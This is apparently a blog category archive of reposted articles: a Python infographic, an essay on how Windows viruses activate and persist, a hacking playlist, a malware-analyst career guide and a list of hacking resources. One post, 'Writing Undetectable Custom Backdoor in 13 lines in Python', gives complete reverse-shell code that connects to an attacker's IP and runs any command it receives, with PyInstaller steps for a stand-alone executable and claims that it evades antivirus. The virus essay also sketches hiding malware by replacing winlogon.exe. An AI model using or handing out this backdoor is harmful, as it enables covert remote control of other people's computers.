Category Archives: Programming

Learn it Faster: The Entire Python Language in a Single Image

A China-based developer Yusheng has created this brilliant infographic that encapsulates the entire Python 3 programming language in a single image. Python is one of the most popular programming languages and it’s a skill every programmer must possess.

Yusheng’s mind map is here for you in easily understandable format that will help you to brush up your memory.

You can find the image online on GitHub, or save it directly from below.

You can also grab your Python Hacker Bundle here.

python 3 in one pic

 

Source:fossbyte

Understanding Viruses

Keep your friends close and enemies closer.

Contrary to popular belief, hacker’s own machines are often more vulnerable to attacks than the average user. This is especially true of those who are new to the world of hacking because of their more frequent access to remote machines, dodgy forums, open administrative privileges on their own machines and inexperience in covering their tracks etc. Further, those who are experienced often take advantage of the ones who are in the learning stage, trying to get into this field. In this dog-eat-dog world, any kind of safety is an illusion unless proven otherwise. Again, for the newbie hacker, it is of vital importance to learn how to protect themselves to avoid being consumed by their own curiosity.

Viruses are perhaps the oldest form of malicious software. They’ve been around for a long time and are still evolving and causing havoc all over the world. At first sight, they seem to be innocent looking executable files, but if opened they can turn your world upside down in a second. Reliance on antivirus software is fine as a first line of defense, but you need a basic arsenal of skills for securing the executables on your system and coping with viruses on your own. Here we discuss proactive methods you can use to defend yourself against malicious executable code in files, resources, component libraries, scripts and macros, as well as how to avoid a handful of other potential vulnerabilities.

Depending on how destructive their payload, computer viruses can result in a significant loss of data, time, and money. In the best scenario, you may just lose the time it takes to disinfect your computer. At worst, a mission-critical server may be reduced to little more than an expensive door-stop. Unfortunately, antivirus software isn’t perfect, and there’s always some lag between the emergence of a new electronic predator and the availability of virus definitions to protect against it. Moreover, many programmers of today’s more diverse and sophisticated computer viruses are taking the preemptive step of disabling or even removing antivirus software as part of their operation.

I’m not suggesting that you shouldn’t rely on your antivirus programs for day-to-day virus protection, especially since antivirus programs are very good at keeping you safe from known threats. However, if you’ve never had to fight a virus without your antivirus software, then it’s only a matter of time before you will. The main reason for this is new viruses. For an antivirus to be able to guard against new viruses, it must first be reported, the virus scanning code must be modified to include this new virus, and finally the virus database copy on the client side must be updated.
Because virus protection changes every day, those annoying notifications that your antivirus probably gives routinely are there to protect you. You must’ve noticed in the UPDATE menu of any antivirus an option to “Update Virus Database” or something like that. This is evidence of the ongoing war against viruses.

In general, how do viruses work? Well, first, the programmer writes the executable code required to carry out the virus’s activation process and then whatever nasty things it’s meant to do. What does the author want the virus to accomplish? Should it reformat your hard drive? Delete JPG files? Mail copies of itself to your friends and coworkers? Making any of this happen requires “executable” code of some kind. Second, in order for this code to execute, the virus needs to be activated or opened. The usual way a virus’s executable code is run is the direct method: some unwary user receives an e-mail attachment called “Click-Here.exe” or something equally enticing. This runs the program and the virus is unleashed.

As easily avoided as this result seems to be, it still works far more often than it should. Virus writers have discovered a number of other, less obvious techniques for getting a virus to take over your computer. Below we take a look at some of these techniques, beginning with the question of what constitutes executable code, then we’ll examine several sneaky activation methods. These activation methods are particularly important, as this is where you’ll understand how to completely unhook viruses from your system in order to regain control of it following an infection.

What Constitutes Executable Code?
Of course, you know that .exe files are executable, as are other similar file types such as .cmd and .com etc. There are many other file types that may contain executable code, and any executable code can be unsafe. In general, executable code falls into three broad categories: standalone programs, code included within resources or libraries, and script or macro code executed by an interpreter of some kind. In a broad sense, a standalone program is pretty much any file type that relies on the operating system for it to execute. How do you know which ones these are? The answer lies in the Windows® registry. To battle against viruses on their own turf, you’ll have to be very comfortable delving into the registry. So let’s take a look at how executable programs are invoked (A little technical, read slowly).

Launch the Registry Editor by opening “Run” and type “regedit”, and expand the HKEY_CLASSES_ROOT (HKCR) node.It’s the operating system’s repository for information on file associations and commands. Under HKCR, you’ll find nodes representing all the file type extensions registered on your computer. Navigate down the tree until you locate the key named .exe. Select this node and observe that its default value (shown in the right-hand pane) is exefile. This is a pointer to another node under HKCR (the exefile key). Scroll down and find the exefile folder. The exefile key contains a shell subkey. This is where a file type’s available actions are defined. In OS terminology, these actions are known as verbs. For example, a Microsoft® Word document might have a “print” verb defined, which allows you to right-click the file in Windows and choose Print from the context menu. Expand the shell subkey for the exefile node to view the available verbs for EXE files. You’ll probably see two or three different subkeys, depending on your system. The one to be concerned with is “open.”(HCKR ->exefile ->shell ->open) Expand this node and select its command subkey. Each verb has its own subkey, and each of those keys in turn has its own command subkey. The default value in this subkey dictates exactly what happens when that verb is executed.

Double-clicking the file icon in Explorer has the same effect—it executes the default verb’s command (open for EXE files). As you can see, for EXE files, the open command verb has a value of: %1 %* This is used in MS-DOS® batch file language. The basic idea is that the path and file name of the EXE file you activated are substituted for the “%1″ parameter, while any switches or command-line parameters that go along with it are passed through the “%*” parameter. So it would stand to reason that any other file types whose open verb evaluates to some flavor of “%1″ would tend to pose a risk. There are a number of these, and they’re all potentially dangerous. Considering that the virus writer knows that most people won’t double-click a file with a .exe extension or a .bat file, there are several other options including : .cmd .com, .pif, .vbs – All of these file types have a default open verb of %1. A virus writer could simply change the .exe extension of his virus executable to ,say .com, and s/he probably just increased the chances that the unsuspecting masses will run it. Particularly dangerous is (was, actually) the humble screen saver file type (.scr extension). Close to the start of the 21st century, .scr viruses were literally everywhere. They were widely believed to be power-saving, which is so not true (Stand-by mode is much better). People thought it couldn’t hurt, right? so what’s the harm. So Naive.. Again, extension hardly matters, everything a .exe virus can do, a .scr one can do equally well. The days of .scr might be gone, but viruses are probably here to stay, Whatever the type, extension, purpose and payload – The core concepts are always the same. So, let’s take a deeper look at the working of .scr viruses. The key to the future lies in the past.

Between the shadows.. In your Registry Editor, compare the open verb’s command default value for EXE and SCR files, respectively. As you will notice, they’re pretty much identical— “%1″ %* for EXEs and “%1″/s for Screen Saver files. Screen savers are, as it turns out, standalone executables. The only difference between these two default verbs is a /S switch for the SCR file type. The intended purpose of the screen saver’s “open” verb is to allow for testing a screen saver, and the screen saver executable interprets the /S switch accordingly. There’s nothing to stop a virus writer from giving their application a .scr extension and then simply ignoring the /S switch passed to it when the user invokes the program. Exploiting the popularity of screen savers was even easier because the caption of the screen saver’s open verb is shown as “Test” in the right-click menu. A user thinks he’s just testing a screen saver, but what he’s actually doing is activating a virus. A particularly clever virus might even display an actual screen saver, preoccupying you with pretty flowers while it destroys files on your hard drive in the background. This caption is stored in the default value for the open key itself. Meaning, just like you can simply find and change your “Recycle Bin”s name to say “Dumpster” or “TrashCan”, you can also change the “Test” option to anything you like. On an unrelated note, you may also change the “Open” option for a word document to maybe “Do Belly Dance” or anything you like. Of course, this only changes the string and not what it does.(Try using the CTRL + F, find function to poke around and feel the power of regedit. Be warned, don’t change anything that you don’t know about. Changing text strings like “My Computer” is harmless, but changing some core functions code may wreck your computer before you can undo it.

Libraries Can Be Dangerous Executable code can live inside resources or component libraries of many different varieties. These may not seem like obvious candidates for viruses, but they can certainly be exploited in that way. These file types include Dynamic Link Libraries (DLL), Control Panel Applets (CPL), various Type Libraries (TLB, OLB, and so on). This code isn’t directly executable with a %1 command verb like .exe, but this doesn’t mean that the code can’t be run. Just about any function exported from a DLL can be invoked using a helper application called RUNDLL32.exe.

A virus could employ two possible attacks. One would be to replace an existing DLL with a compromised version, in which a particular function is replaced by one of the same name but with altered functionality. Then, whenever the system invokes this function, instead of having the desired result, the virus is activated instead. The second approach is simply to write a DLL from scratch and invoke its functions using RUNDLL32.EXE when needed. This isn’t quite as straightforward as invoking the code in an EXE file, but a DLL, OCX, TLB or other library file is more likely to be accepted by an unsuspecting user or to be overlooked by an antivirus program, so it may well be worth the greater effort on the virus author’s part.

Scripts and Macros—Increased Flexibility Brings Increased Risk Script code requires a script engine to interpret and run, but it can still be exploited. Scripts come in several forms, they may be used to perform a repetitive task, modify documents, pretty much everything that a .exe file can do. Microsoft has done a lot to tighten the security of these macros and scripts, but it’s still easy for a macro virus to do a lot of damage. A popular script category is Windows Script Host (WSH) files. These files, usually with .wsf, .js, or .vbs extensions, carry a default file association which causes them to be executed, no questions asked, when users double-click them. As you might imagine, this can be disastrous.

Web applications may also carry dangerous scripts. Client-side scripts, for example are fairly limited in their access to the host system for security reasons, but there’s a little-known file type, the HTML Application (with an HTA extension), which works like a client-side Web application without the same security restrictions. Its purpose is to allow developers to use their Web development skills to build rich applications using the Web browser metaphor. But again, the unsuspecting user can unleash all sorts of chaos by downloading and executing such a file without first examining its contents. All of these scripts and macros can be readily examined before they’re executed, but clearly an average user won’t bother reading some weird code.

Virus Activation Methods The most common way for a virus to be activated is for a user to directly execute, say an e-mail attachment. Virus writers do just about anything to make you open the attachment using this action, but most developers are savvy enough not to just run an unknown executable. Of course, just about all of us have done it at one time or another—particularly now that viruses can access address books and can assemble a credible-looking e-mail message, ostensibly from someone you know and trust. Be that as it may, as users have become more aware, virus creators have gotten more devious, and there is now a host of new methods for activating a virus on a computer that don’t require any code to be explicitly executed (E-mail attachment viruses are a rare sight nowadays, since most email services themselves check emails for malicious files).

Registration Files Files with a REG extension, are system registration files that hold information to be integrated into the system registry. The problem with them is that they carry a default verb of “open”. This means that if any registration file is double-clicked, it immediately dumps its contents directly into the system registry, without any confirmation required (depending on your OS). Since it has access to the registry, it is free to modify anything it pleases. It may delete vital keys required for the system to startup or even modify existing ones to make further file types vulnerable. Also, it may create a new entry for a previously unknown extension. A general antivirus may not recognize and hence ignore a file extension of for example, .bobo. But in the registry there could be an entry to make the file’s default action to “Open” or “Run” – giving it all the powers of a .exe file. This could be potentially devastating. Luckily, most antivirus softwares nowadays are adopting the “sandboxing” technique to run untested files. Basically the antivirus gives the file a test run in a secure and sealed environment (sandbox) and checks if it tries to get out by for example, trying to access something that it’s not supposed to or changing system settings and variables without asking the users explicitly. Inside the sandbox, it is denied anything remotely suspicious and the antivirus raises a big red flag and moves the file to the quarantine section (virus vault) or maybe even delete it straightaway.

Path Vulnerabilities Another hazard is something called the PATH environment variable. Anyone who uses a computer is bound to have used a “shortcut” file at least once. Whether it’s the “Google Chrome” icon on your desktop or maybe “WinZip” in your taskbar these shortcut files are simply links to the actual files stored in the folder in which they were installed. It’s clearly a little tedious to open “My Computer” -> C: Drive -> Program Files -> Mozilla .. To open “Mozilla Firefox” every time. Hence, we have these shortcut files which simply store the “Path” to the actual application. These files don’t exactly use the Path environment variable, but the concept is exactly the same.

The computer has certain files (example: explorer.exe) that it may routinely need to open (example: at startup). So, in the Registry it has simply stored the name of the file it needs to open, and it’s path (in a path variable). Whenever the OS needs to open a particular system file it simply looks it up in the registry, follows the path in the memory and opens it. What does this has to do with viruses? With everything from phones to cars to houses getting smarter every moment, our computer viruses are not behind. It’s just a little too obvious and literally “on the nose” when a user clicks a file and his computer goes berserk. Once infected, our victim, although compromised is now a little wiser for he knows exactly where it went wrong. If the victim downloaded something from a website that caused damage to his system, s/he may report the website to the police. Clearly jail time is not so appealing to anyone, let alone virus programmers.

This brings us back to path vulnerabilities. Get this. The attacker needs to infect a system without making it too obvious. To do so, s/he needs a time gap between the actual infection and the attack, so that it hits the victim out of the blue. We have two ways to do this by exploiting the path variable. Average users don’t really bother to sniff around system files like in the “Windows” folder (you may find this in your C: drive) and this much understandable carelessness can be exploited. The attacker can simply take two systems, one with Windows 7 and the other with XP and search for the location of (example) “winlogon.exe” – A file that is used by the OS to maintain a user session. (You may find this running in the task manager). Now in the virus file, the attacker can simply write up code to create two copies of virus and send one to the path for Windows 7, and the other one to the path for Windows XP. (The path for the “winlogon.exe” file, which s/he searched earlier). After this, the virus can be coded to delete the file “winlogon.exe” and simply rename itself “winlogon.exe”. So, on the next startup when the OS looks up this file, it instead unleashes the virus and we’ve got BOOM. Total stealth, total annihilation and the victim has got no clue of what the hell just happened. The other way to do this is to code the virus to edit the path in the registry from it’s default value to where it (the virus) is stored. It can then rename itself and in this case on the next startup the OS doesn’t even go to the actual file but instead to the virus and starts it up. Equally effective.

The Best Offense is a Strong Defense Understanding how viruses take hold is the first step in knowing how and where to untangle them from your system once it has been compromised. As viruses become more sophisticated, you can expect them to become more aggressive toward your antivirus software. So what can we do about these nefarious little beasties? We’ve come a long way. Even though the end is not in sight, the roads that lie ahead of us are shorter than the ones behind. Cyber Security today, is tighter than ever but that doesn’t mean we are immune to attacks. If you do have the latest antivirus software and keep your OS updated, you probably don’t need to worry about 99% of all the malcious software out there, but the remaining 1% is the reason why cyber security is a $100 billion market today. Successful attacks are rarer today than ten years ago, but they certainly make up for it in sheer intensity. More and more people each day are relying more and more on their computers, not knowing that simply entering their credit card information on a secure website could be sending all those details to a hacker. Attacks and infections are decreasing in number, but rising in desctructiveness. Today, almost nobody bothers to spread around a virus that simply causes reboots or wipes data, since there’s no real gain for the hacker in it. The malicious softwares today are much more targeted. Clearly, obtaining someone’s social security number or bank pin is much more valuable to a hacker than deleting some random person’s movies and pictures.

The only thing we can do is keep our eyes open and turn around at the slightest hint of trouble. Avoid downloading from unconfirmed sources and make sure your antivirus software and OS is updated. Even if your system is compromised you may never actually know it, but the hacker could have identified that you are an easy target. If just once he could get valuable information from your system, it’s very likely that he will keep the system compromised, silently (make it a slave). Further, make sure to never ever store sensitive or financial information on your computer. Keeping it on an offline system or an external hard drive is much safer.

Source: xueshack.com

Best Tracks To Listen To Whilst Hacking or Programming

best tracks to listen to whilst hacking
best tracks to listen to whilst hacking

I have made a list based on your comments about the best tracks to listen to whilst hacking or programming. Feel free to comment and I will add them to the list.

black sabbath – iron man
Godsmack – I stand alone
Zoraide – Cairobe
Rev Theory – hell yeah
Black Label Society – My Dying Time
skilet – monster
Wiz Khalifa – Work Hard Play Hard
Matrix soundtrack – clubbed to death
Rage against the machine – Wake up
David Guetta – Dangerous
Giorgio Moroder – 74 Is the New 24
United State of Pop 2014 – Do What You Wanna Do
Delerium – Silence ft. Sarah McLachlan
linkin park – Numb
A Skylit Drive – Crazy
2 Pac – Hit em up
Zedd – Clarity
goo goo dolls – Iris
iron maiden brave new world
Avicii – Levels
The Unlikely Candidates-Follow My Feet
Joe Esposito – You’re the best around
The Heavy – Short Change Hero
The Best of Two Steps From Hell | Ultimate Playlist
KT Tunstall – black horse and a cherry tree
Two Steps from Hell
Ryan Leslie-Swiss Francs
Windows Remix
Berlin Breakdown
come what may -air supply
Yuzurenai-negai
Tristam – ‘Till It’s Over
Tristam – I remember
jerryc – Canon rock
system of down – Toxicity
Cradle of filth- new day kicking
Metallica – master of puppets
battery, ride the lightning
Anti flag – you gotta die for your government
Guile’s theme
bryan adams – Dont give up
Red Hot Chili Peppers – Higher ground
TWRK – Living Room
life after river
Great Dane invite only
Drop the Bass trap remix
radioactive – imagine dragons
iron man – ready aim fire
System of a Down – Attack
linkin park – in the end
Daft Punk – Airodynamic
Daft Punk – Around the World
Daft Punk – One more time
Metallica – Orion
Police – The Other Way of Stopping
Flogging Molly – Black Friday Rule
That Fucking Tank – Stephen Hawkwind
Trans Am – Future World
Turing Machine – Synchronicity III
Prodigy – Voodoo People
Powerman 5000 – Free, Bombshell, When Worlds Collide
Prodigy – Thunder
Deadmau5 – The 16th Hour
Elephant – Tame Impala

– Advertisement –

Movie Soundtracks

Tron Soundtrack
The Social Network Soundtrack
The Matrix Soundtrack
Resident Evil Soundtrack

Can’t be bothered to search for the songs above?… here are some random ones you would never hear on the radio… feed you inner geek!

– Advertisement –

Writing Undetectable Custom Backdoor in 13 lines in Python

Malware
Computer security concept. Virus in program code

 

Today we are going to program a simple custom backdoor — a few lines of code — that totally avoids detection by every a/v out there. We’re gonna be writing this code in the Python programming language. If you don’t have the environment set up, never worry. I have another brief video/post showing you the requirements, click here to check it out.

The idea is to give you guys the power of creating your own backdoors instead of blatantly depending on crypters, third-party code (which isn’t always safe to use) and so on. In all honesty, I’m just as new to Python as most of you readers probably are — although if you check my about page, I do program in other languages — nevertheless I have faith that with a little effort we will be able to not only create a stealthier backdoor, but also add new features as well such as persistence, keylogging and maybe even a multi-threaded listener to control more than one client at a time.

Right now, this is mainly speculation and of course, the main aspect of this is not to have a shell to do bad things with it, but to learn how these protocols work in and out of Python — so yes, if you are interested in custom backdoors for another language, just drop a line. :)

Hopefully this tutorial will also become a series, so long as you guys — the readers — collaborate ideas to implement and help out as well to make a stealthier custom backdoor.

Credits on the code go out to Dave Kennedy and his work on building several Python shells.

Custom Shell

Here is the code used for the custom shell, just make sure to substitute anywhere with an underline for your own values, such as IP, port, etc.

#!/usr/bin/python
import subprocess,socket
HOST = 'Your IP Adress'
PORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('Hello There!')
while 1:
data = s.recv(1024)
if data == "quit": break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdoutput = proc.stdout.read() + proc.stderr.read()
s.send(stdoutput)
# loop ends here
s.send('Bye now!')
s.close()

You can click here and download my copy of the backdoor and netcat. [ DOWNLOAD ]

I have seen this code in a few places, such as Dave K’s blog and the book “Foundations of Python Network Programming” both listed at the end of this post in the further readings section…

Compiling Executable

As mentioned in my previous post we will be using PyInstaller to create the stand-alone executable. It comes out pretty heavy for a shell (a few megs) but hey, works mint and completely undetectable.

Here is the code used for compiling the code, again, just replace the underlined part. Oh yea, make sure you are inside the PyInstaller directory as well… and that you have your code copied to that location.

python Configure.py
python Makespec.py --onefile shell.py
python Build.py shell\shell.spec

That’s about it, your executable should be ready to go — inside the /dist folder.

Presentation

Check out the video for commentary explaining the code line by line…

 

Source:technicdynamic

So You Want To Be A Malware Analyst

In war, there are always two sides: the attackers and the defenders.  A less focused on group is the researchers and developers.  While soldiers are fighting a war on the front lines, scientists and engineers are researching and developing new weapons, defenses and tools; things that give their side an advantage.  If one of these such creations is ever captured  by the opposing forces, it is reverse engineered to understand exactly how it works, how it can be defended against and even how to re-purpose it.  The same goes for war on the cyber front, malicious attackers and system administrators (Black and White Hats) are the soldiers, malware authors develop new and dangerous forms of malware and Malware Analysts reverse engineer these weapons to find out how to stop them.

What is a Malware Analyst?

A Malware Analyst is a highly specialized reverse-engineer, programmer and detective.  They accomplish their task by using various tools and expert level knowledge to understand not only what a particular piece of malware can do but also how it does it.  Becoming a Malware Analyst requires a large amount of focus and ,discipline as well as training and practice of the inner workings of computer systems, programming methodologies in multiple languages and a keen mind for solving puzzles and connecting the dots.

You might consider becoming a Malware Analyst if you have a passion for computer security, enjoy solving puzzles and like the prospect of always learning new things.  You might also enjoy it if you prefer a profession that always poses a challenge or if you look forward to working on new and interesting things. No day is ever the same as the previous, everyday is an opportunity to learn something new and fine-tune your skills. In addition to the personal satisfaction you would get from being a Malware Analyst, you would also become a samurai in the fight to make the cyber world a safer place.

The type of person who would be perfect for becoming a Malware Analyst would be:

  • A fast learner
  • Able to derive meaning from nonsense
  • A good puzzle solver
  • Able to think outside of the box
  • Willing to frequently use the scientific method
  • Resourceful

Prerequisites

Prior to walking the path to become a Malware Analyst, a person should be familiar with:

  • Operating System Concepts
  • High Level & Low Level Programming (familiarity is fine, working knowledge not required at first)
  • Fundamentals of networking
  • How to use the internet to perform research

Building the basics

Being a Malware Analyst can take you many different places during your career and you can end up analyzing all types of malware, from normal application malware to exploits hidden in PDF files or malware found on smart phones.  So where should you start when it comes to your training? You should master a few basics before trying anything too advanced:

Learn Assembly Language

In the hierarchy of programming languages, you have at the very top scripting languages like PERL or Python, followed by high and middle level languages like C++, C. Followed down by Assembly language, machine language and finally binary code which is read by the hardware.

Most malware is written in a Middle Level language and once the code is completed, it is compiled all the way down so it can be read by the hardware and/or operating system. At this level, the code is not “Human Readable” or easily read by human eyes.  In order for a Malware Analyst to be able to read the malware code, they will need to disassemble it. Unfortunately, the highest language derived from binary code is Assembly, which is the last level of human readable code. Therefore, it is imperative that a would-be Malware Analyst, also learn how to read and write Assembly code.

Assembly language is low-level and therefore involves many more instructions than you would see in a higher-level program. For example, the code required to print something in the console in a higher-level languages is usually just one line and sometimes just one symbol. In Assembly, this simple procedure may require anywhere from 5 to 20 lines of code.

Analysts Tip:  Learning Assembly is easy if you already know a higher-level language, imagine what the operating system needs to do in order for a single function call to execute, this is what you will see in Assembly.  By learning shortcuts to parsing Assembly, you will find what you are looking for much faster.

Learn how to use the tools

As a construction worker needs to know how to use a hammer and a mechanic needs to know how to use a wrench, a Malware Analyst needs to know to work their own set of unique and powerful tools.  Some tools are easy to use and some are not, some have clear output and some dump you with lots of data that you need to be able to parse.  The tools of a Malware Analyst are incredibly important and usually one  of the first things learned. Here is a list of the types of tools required and some examples of them:

  • Dissasembler – IDA Pro
  • Debugger – OllyDbg, WinDbg
  • System Monitor – Process Monitor, RegShot. Process Explorer
  • Network Monitor – TCP View, Wireshark
  • Packer Identifier – PEID
  • Unpacking Tools – Qunpack. GUNPacker
  • Binary Analysis Tools – PE Explorer, Malcode Analysts Pack
  • Code Analysis Tools  – LordPE, ImpRec

Once you learn how the tools work and what you could do with them, your quest in analyzing malware will become easier and easier. Also, keep in mind that while you might originally learn how to use a specific suite of tools, new tools are being developed all the time that might be more helpful in both their design and function.

Learn about malware

Learning about malware might seem a bit redundant when you are training to become a Malware Analyst; however, it is a very important aspect of your training.  Malware evolves and changes every year, it uses new methods to infect as well as operate and sometimes brings back old methods if they are applicable again.  If you were writing a program to play Tic-Tac-Toe, you could try to write it from scratch, or you could see how other people have written it before and get an idea of what you need to do.  The same applies for malware analysis; reading white papers and analysis reports about different types of malware will give you an idea of what you might be seeing while reversing.

Process injection is a method that malware uses to hide its operations, it must go through a set of functions in order to perform this technique and it is important that you be able to identify it happening in the code based upon prior experience and knowledge about how malware works.  Research, practice, knowledge and experience are key to being able to effectively analyze new malware and should be the staples of your Malware Analyst training.

Helpful Links and Sources

There are many different ways to learn about becoming a Malware Analyst; some people choose to go through courses taught online or in person, which can cost upwards of a few thousand dollars. Other people choose to learn as they go, picking up information where they can and learning from their own experience.  Both are decent ways of learning about malware analysis but the cheap and easy way would be through doing online research and reading lots of books. Here is a list of my favorite sources for learning about malware analysis:

Online Sources:

Books:

Conclusion

Whether it is to start a new career or just simple curiosity, learning about Malware Analysis can be a very challenging and rewarding path.  It can test your patience, concentration and sometimes even your temper, but the payoff when you have been working on a file for hours and finally come across the key function or piece of data you were looking for, cannot be duplicated by anything else.  The future holds a war between those who use malware and those who fight against it and as technology advances, so too does the methods in which malware authors write programs to exploit and control it. The next generation of malware fighters will require a more advanced knowledge than ever before they will be the cyber samurai.

Source: malwarebytes

80+ Best Free Hacking Tutorials | Resources to Become Pro Hacker

Green-Hacker-Wallpaper-Desktop

Learning to become hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for simple hacking people do. Even to start doing the simplest hack on own, a hacker requires to have in depth knowledge of multiple topics. Some people recommend minimum knowledge of few programming languages like C, Python, HTML with Unix operating system concepts and networking knowledge is required to start learning hacking techniques.

Though knowing a lot of things is required, it is not really enough for you to be a competent and successful hacker. You must have a passion and positive attitude towards problem solving. The security softwares are constantly evolving and therefore you must keep learning new things with a really fast pace.

If you are thinking about ethical hacking as a career option, you may need to be prepared for a lot of hard/smart work. I hope these free resources will help you speed up on your learning. If you decide you pursue ethical hacking as a career option, you may also want to read some

IN DEPTH ETHICAL HACKING BOOKS

.

A lot of people (including me before doing research for this article) think that they can become a hacker using some free hacking tools available on web. Its true that some common types of hacking can be easily done with help of tools, however doing it does not really make you a hacker. A true hacker is the one who can find a vulnerability and develop a tool to exploit and/or demonstrate it.

Hacking is not only about knowing “how things work”, but its about knowing “why things work that way” and “how can we challenge it”.

Below are some really useful hacking tutorials and resources you may want to explore in your journey of learning to hack

Hacking For Dummies – Beginners Tutorials

These tutorials are not really simple for anyone who is just starting to learn hacking techniques. However, these should be simple starting point for you. I am sure you have different opinion about complexity of each tutorial however advanced hacker are going to be calling this a job of script kiddie (beginner hacker). Even to acquire the skills of a script kiddie you need to have good understanding of computer fundamentals and programming.

  1. CYBRARY – For those looking to learn ethical hacking skills online, Cybrary provides the perfect platform to do so. Cybrary is a free online IT and cyber security training network that provides instruction in the form of self-paced, easy-to-follow videos. Featuring courses on topics such as Penetration Testing and Ethical Hacking, Advanced Penetration Testing, Post Exploitation Hacking and Computer and Hacking Forensics, Cybrary provides instruction from the beginner to the highly-advanced level of hacking. Additionally, Cybrary offers supplemental study material along with their courses free of charge. With their in-depth training videos and study guides, Cybrary ensures that users develop the best hacking skills.
  2. HACKING TUTORIALS FOR BEGINNERS – By BreakTheSecurity.com
  3. HOW TO LEARN ETHICAL HACKING – By Astalavista.com
  4. PENETRATION TESTING TUTORIAL – By Guru99.com
  5. BACKTRACK PENETRATION TESTING TUTORIAL
  6. INTRODUCTION TO PENETRATION TESTING
  7. INFORMATION GATHERING WITH NMAP
  8. SIMPLE HOW TO ARTICLES By Open Web Application Security
  9. THE SIX DUMBEST IDEAS IN COMPUTER SECURITY
  10. SECURE DESIGN PRINCIPLES
  11. 10 STEPS TO SECURE SOFTWARE

Cryptography Related Tutorials

Cryptography is must know topic for any aspiring security professional or a ethical hacker. You must understand how encryption and decryption is done. You must understand why some of the old encryption techniques do not work in modern computing world.

This is a important area and a lot of software programmers and professional do not understand it very well. Learning cryptography involves a lot of good understanding of mathematics, this means you also need to have good fundamentals on discrete mathematics.

  1. INTRODUCTION TO PUBLIC KEY CRYPTOGRAPHY
  2. CRYPTO TUTORIAL
  3. INTRODUCTION TO CRYPTOGRAPHY
  4. AN OVERVIEW OF CRYPTOGRAPHY
  5. CRYPTOGRAPHY TUTORIALS – Herong’s Tutorial Examples
  6. THE CRYPTO TUTORIAL – Learn How to Keep Secret Secret
  7. INTRODUCTION TO CRYPTOLOGY, PART 1: BASIC CRYPTOLOGY CONCEPTS

Websites For Security Related Articles And News

These are some websites, that you may find useful to find hacking related resources and articles. A lot of simple tricks and tips are available for experimenting through these sites for improving yourself to become advanced hacker.

In recent years, many people are aspiring to learn how to hack. With growing interest in this area, a lot of different types of hacking practices are evolving. With popularity of social networks many people have inclined towards vulnerability in various social networks like facebook, twitter, and myspace etc.

Continuous learning about latest security issues, news and vulnerability reports are really important for any hacker or a security professional. Some of the sites that keep publishing informative articles and news are listed here.

  1. HTTP://WWW.ASTALAVISTA.COM/
  2. HTTP://PACKETSTORMSECURITY.COM/
  3. HTTP://WWW.BLACKHAT.COM/
  4. HTTP://WWW.METASPLOIT.COM/
  5. HTTP://SECTOOLS.ORG/
  6. HTTP://WWW.2600.COM/
  7. DEF CON – HACKING CONFERENCE
  8. HTTP://WWW.BREAKTHESECURITY.COM/
  9. HTTP://WWW.HACKING-TUTORIAL.COM/
  10. HTTP://WWW.EVILZONE.ORG/
  11. HTTP://HACKADAY.COM/
  12. HTTP://WWW.HITB.ORG/
  13. HTTP://WWW.HACKTHISSITE.ORG/
  14. HTTP://PENTESTMAG.COM
  15. HTTP://WWW.SECURITYTUBE.NET/
  16. HTTPS://WWW.SSLLABS.COM/

EBooks And Whitepapers

Some of the research papers by security experts and gurus can provide you a lot of information and inspiration. White papers can be really difficult to read and understand therefore you may need to read them multiple times. Once you understand the topic well, reading will become much faster and you will be able to skim through a lot content in less time.

  1. HANDBOOK OF APPLIED CRYPTOGRAPHY – This ebook contains some free chapter from one of the popular cryptography books. The full book is also available on amazon atCRYPTOGRAPHY BOOK.
  2. NETWORK PENETRATION TESTING GUIDE
  3. HOW TO HACK ANYTHING IN JAVA
  4. MCAFEE ON IPHONE AND IPAD SECURITY
  5. A GOOD COLLECTION OF WHITE PAPERS ON SECURITY AND VULNERABILITIES – This site contains collection of white papers from different sources and some of these white papers are really worth referring.
  6. ENGINEERING PRINCIPLES FOR INFORMATION TECHNOLOGY SECURITY
  7. BASIC PRINCIPLES OF INFORMATION PROTECTION
  8. OPEN WEB APPLICATION SECURITY PROJECT – OWASP is one of the most popular sites that contains web application security related information .

Videos & Play Lists

Those who like to watch video tutorials, here are few I liked. However there are many small video available on youtube. Feel free to explore more and share with us if you like something.

  1. CRYPTOGRAPHY COURSE By Dan Boneh Stanford University
  2. OPEN SECURITY TRAINING– Youtube Playlist of More than 90 hours. I have found this to be the biggest free training available for security related topic.
  3. OWASP APPSEC USA 2011: Youtube Playlist containing compilation of OWASP conference highlight in 2011.
  4. DEFCON: HOW I MET YOUR GIRLFRIEND – Defcon is one of the most popular hacker conference. The presenters in this conference are well know inside the hacking industry.
  5. DEFCON: WHAT HAPPENS WHEN YOU STEAL A HACKERS COMPUTER
  6. DEFCON: NMAP: SCANNING THE INTERNET
  7. PUBLIC KEY CRYPTOGRAPHY: Diffie-Hellman Key Exchange
  8. WEB APPLICATION PEN TESTING
  9. INTRO TO SCANNING NMAP, HPING, AMAP, TCPDUMP, METASPLOIT

Forums For Hackers And Security Professionals

Just like any other area, forums are really great help for learning from other experts. Hundreds of security experts and ethical/non-ethical hackers are willing to share their knowledge on forums for some reason. Please keep in mind to do enough research before post a question and be polite to people who take time to answer your question.

  1. STACKOVERFLOW FOR SECURITY PROFESSIONALS
  2. HTTP://DARKSAT.X47.NET/
  3. HTTP://FORUMS.SECURITYINFOWATCH.COM/
  4. HTTP://FORUMS.CNET.COM/SPYWARE-VIRUSES-SECURITY-FORUM/
  5. HTTP://WWW.HACKFORUMS.NET/FORUMDISPLAY.PHP?FID=47

Vulnerability Databases And Resources

Vulnerability Databases are the first place to start your day as a security professional. Any new vulnerability detection is generally available through the public vulnerability databases. These databases are a big source of information for hackers to be able to understand and exploit/avoid/fix the vulnerability.

  1. HTTP://WWW.EXPLOIT-DB.COM/
  2. HTTP://1337DAY.COM/
  3. HTTP://SECURITYVULNS.COM/
  4. HTTP://WWW.SECURITYFOCUS.COM/
  5. HTTP://WWW.OSVDB.ORG/
  6. HTTP://WWW.SECURITEAM.COM/
  7. HTTP://SECUNIA.COM/ADVISORIES/
  8. HTTP://INSECURE.ORG/SPLOITS_ALL.HTML
  9. HTTP://ZERODAYINITIATIVE.COM/ADVISORIES/PUBLISHED/
  10. HTTP://NMRC.ORG/PUB/INDEX.HTML
